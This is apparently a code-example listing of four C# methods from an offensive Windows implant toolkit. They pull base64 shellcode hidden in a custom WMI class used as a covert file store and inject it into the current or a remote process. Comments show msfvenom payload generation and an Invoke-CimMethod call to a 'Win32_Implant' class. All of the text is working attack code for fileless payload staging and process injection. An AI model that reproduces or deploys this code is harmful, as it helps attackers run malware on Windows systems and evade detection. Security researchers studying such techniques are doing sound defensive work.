Example #1
0
        public static void InjectShellCodeWMIFSB64(String processId, String wmiClass, String fileName)
        {
            Byte[] peBytes         = Misc.QueryWMIFS(wmiClass, fileName);
            String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);

            Int32 dwProcessId = 0;

            if (String.IsNullOrEmpty(processId))
            {
                using (var injectShellCode = new InjectShellCode(shellCodeString))
                {
                    injectShellCode.Execute();
                }
            }
            else if (Int32.TryParse(processId, out dwProcessId))
            {
                using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId))
                {
                    using (var tokens = new Tokens())
                    {
                        injectShellCodeRemote.Execute();
                    }
                }
            }
            else
            {
                Console.WriteLine("Unknown Error");
            }
        }
Example #2
0
        public static string InjectShellCodeWMIFSB64(string wmiClass, string fileName, Int32 processId)
        {
            //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
            //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
            ConnectionOptions options = new ConnectionOptions();

            options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
            ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options);

            scope.Connect();

            ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
            ManagementObjectSearcher   searcherIndexCount   = new ManagementObjectSearcher(scope, queryIndexCount);
            ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get();
            int indexCount = queryIndexCollection.Count;

            String EncodedText = "";

            for (int i = 0; i < indexCount; i++)
            {
                ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");
                ManagementObjectSearcher   searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart);
                ManagementObjectCollection queryCollection  = searcherFilePart.Get();
                foreach (ManagementObject filePart in queryCollection)
                {
                    EncodedText += filePart["FileStore"].ToString();
                }
            }
            byte[] peBytes         = System.Convert.FromBase64String(EncodedText);
            String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);

            InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);

            return(injectShellCodeRemote.GetOutput());
        }
Example #3
0
        //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
        public static void InjectShellCode(String strProcessId, String shellCodeString)
        {
            Int32 dwProcessId = 0;

            if (String.IsNullOrEmpty(strProcessId))
            {
                using (var injectShellCode = new InjectShellCode(shellCodeString))
                {
                    injectShellCode.Execute();
                }
            }
            else if (Int32.TryParse(strProcessId, out dwProcessId))
            {
                using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId))
                {
                    using (var tokens = new Tokens())
                    {
                        injectShellCodeRemote.Execute();
                    }
                }
            }
            else
            {
                Console.WriteLine("Unknown Error");
            }
        }
Example #4
0
        public static string InjectShellCode(string shellCodeString, Int32 processId)
        {
            //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
            //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
            InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);

            return(injectShellCodeRemote.GetOutput());
        }